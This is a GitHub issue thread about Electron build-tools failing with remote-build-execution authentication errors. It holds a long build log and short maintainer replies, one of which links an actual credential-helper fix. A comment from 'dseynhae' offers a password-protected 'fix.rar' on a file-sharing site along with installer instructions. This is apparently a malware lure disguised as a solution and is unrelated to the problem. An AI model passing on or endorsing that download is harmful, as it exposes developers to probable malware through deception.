### ISSUE TITLE
Add a section that documents `e d` in README

### ISSUE THREAD

**Issue by yangannyx** [electron/build-tools#627]
### Additional Information

I recently tried running `e build` and started running into auth issues. Previously, the `e` commands checked if I was authed and would give me a link to auth in if needed. Now that that link isn't available in the shell command, it's not obvious how to auth in.

```
e build
WARN We've made these temporary changes to your configuration:
 * removed deprecated goma property
Run "e sanitize-config" to make these changes permanent.
Running "autoninja -j 200 electron" in /Users/anny/code/opensource/electron/src/out/Testing
Proxy started successfully.
...
FAILED: obj/third_party/protobuf/protobuf_full/field_comparator.o
../../buildtools/reclient/rewrapper -cfg=../../buildtools/reclient_cfgs/chromium-browser-clang/rewrapper_mac.cfg -exec_root=/Users/anny/code/opensource/electron/src/ ../../third_party/llvm-build/Release+Asserts/bin/clang++ -MMD -MF obj/third_party/protobuf/protobuf_full/field_comparator.o.d -DHAVE_ZLIB -DDCHECK_ALWAYS_ON=1 -D_LIBCPP_HARDENING_MODE=_LIBCPP_HARDENING_MODE_EXTENSIVE -D__ARM_NEON__=1 -DCR_XCODE_VERSION=1500 -DCR_CLANG_REVISION=\"llvmorg-20-init-1009-g7088a5ed-10\" -D_LIBCPP_DISABLE_VISIBILITY_ANNOTATIONS -D_LIBCXXABI_DISABLE_VISIBILITY_ANNOTATIONS -DCR_LIBCXX_REVISION=9c3fb06173cf5a291faf8823dfb82a3da6835bc3 -DTEMP_REBUILD_HACK -DNDEBUG -DNVALGRIND -DDYNAMIC_ANNOTATIONS_ENABLED=0 -DGOOGLE_PROTOBUF_NO_RTTI -DGOOGLE_PROTOBUF_NO_STATIC_INITIALIZER -DGOOGLE_PROTOBUF_INTERNAL_DONATE_STEAL_INLINE=0 -DHAVE_PTHREAD -I../.. -Igen -I../../buildtools/third_party/libc++ -I../../third_party/protobuf/src -I../../third_party/zlib -fno-delete-null-pointer-checks -fno-ident -fno-strict-aliasing -fstack-protector -fcolor-diagnostics -fmerge-all-constants -fno-sized-deallocation -fcrash-diagnostics-dir=../../tools/clang/crashreports -mllvm -instcombine-lower-dbg-declare=0 -mllvm -split-threshold-for-reg-with-hint=0 -ffp-contract=off -fcomplete-member-pointers --target=arm64-apple-macos -mno-outline -Wno-builtin-macro-redefined -D__DATE__= -D__TIME__= -D__TIMESTAMP__= -ffile-compilation-dir=. -no-canonical-prefixes -ftrivial-auto-var-init=pattern -O2 -fno-math-errno -fno-omit-frame-pointer -gdwarf-4 -g1 -gdwarf-aranges -isysroot sdk/xcode_links/MacOSX14.0.sdk -mmacos-version-min=11.0 -fvisibility=hidden -Wheader-hygiene -Wstring-conversion -Wtautological-overlap-compare -Xclang -add-plugin -Xclang find-bad-constructs -Xclang -plugin-arg-find-bad-constructs -Xclang span-ctor-from-string-literal -Xclang -plugin-arg-find-bad-constructs -Xclang raw-ref-template-as-trivial-member -Xclang -plugin-arg-find-bad-constructs -Xclang check-stack-allocated -Xclang -plugin-arg-find-bad-constructs -Xclang check-allow-auto-typedefs-better-nested -Xclang -add-plugin -Xclang raw-ptr-plugin -Xclang -plugin-arg-raw-ptr-plugin -Xclang check-raw-ptr-to-stack-allocated -Xclang -plugin-arg-raw-ptr-plugin -Xclang disable-check-raw-ptr-to-stack-allocated-error -Xclang -plugin-arg-raw-ptr-plugin -Xclang raw-ptr-exclude-path=../../third_party/dawn/ -Xclang -plugin-arg-raw-ptr-plugin -Xclang check-raw-ptr-fields -Xclang -plugin-arg-raw-ptr-plugin -Xclang check-raw-ref-fields -Wall -Wno-unused-variable -Wno-c++11-narrowing -Wno-unused-but-set-variable -Wno-misleading-indentation -Wunguarded-availability -Wno-missing-field-initializers -Wno-unused-parameter -Wno-psabi -Wloop-analysis -Wno-unneeded-internal-declaration -Wno-cast-function-type -Wno-deprecated-this-capture -Wno-invalid-offsetof -Wno-vla-extension -Wno-thread-safety-reference-return -Werror -Wno-unused-function -std=c++20 -Wno-trigraphs -fno-exceptions -fno-rtti -nostdinc++ -isystem../../third_party/libc++/src/include -isystem../../third_party/libc++abi/src/include -fvisibility-inlines-hidden -Wenum-compare-conditional -Wno-c++11-narrowing-const-reference -Wno-missing-template-arg-list-after-template-kw -Wno-dangling-assignment-gsl -c ../../third_party/protobuf/src/google/protobuf/util/field_comparator.cc -o obj/third_party/protobuf/protobuf_full/field_comparator.o
F0826 11:42:33.487138   13835 main.go:213] Command failed: rpc error: code = Unauthenticated desc = Unable to authenticate with RBE, externally provided auth token was invalid
rpc error: code = Unauthenticated desc = rpc error: code = Unauthenticated desc = No valid authorization header containing a bearer token provided, authentication type (identity) used="external authentication token (credentials helper)"
[204/52491] ACTION //third_party/devtools-frontend/src/front_end/ui/components/code_highlighter:css_files(//build/toolchain/mac:clang_arm64)
ninja: build stopped: subcommand failed.
RBE Stats: down 0 B, up 0 B,
ERROR Error: Command failed: autoninja -j 200 electron
    at checkExecSyncError (node:child_process:885:11)
    at Object.execFileSync (node:child_process:921:15)
    at Object.depotExecFileSync [as execFileSync] (/Users/anny/.electron_build_tools/src/utils/depot-tools.js:149:23)
    at runNinja (/Users/anny/.electron_build_tools/src/e-build.js:86:9)
    at Command.<anonymous> (/Users/anny/.electron_build_tools/src/e-build.js:140:9)
    at Command.listener [as _actionHandler] (/Users/anny/.electron_build_tools/node_modules/commander/lib/command.js:480:17)
    at /Users/anny/.electron_build_tools/node_modules/commander/lib/command.js:1234:65
    at Command._chainOrCall (/Users/anny/.electron_build_tools/node_modules/commander/lib/command.js:1151:12)
    at Command._parseCommand (/Users/anny/.electron_build_tools/node_modules/commander/lib/command.js:1234:27)

```

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by MarshallOfSound** [comment]
Are you still in this state? Wondering what ` d rbe status` spits out

**Comment by jkleinsc** [comment]
@MarshallOfSound I figured it out: https://github.com/electron/rbe-credential-helper/pull/16
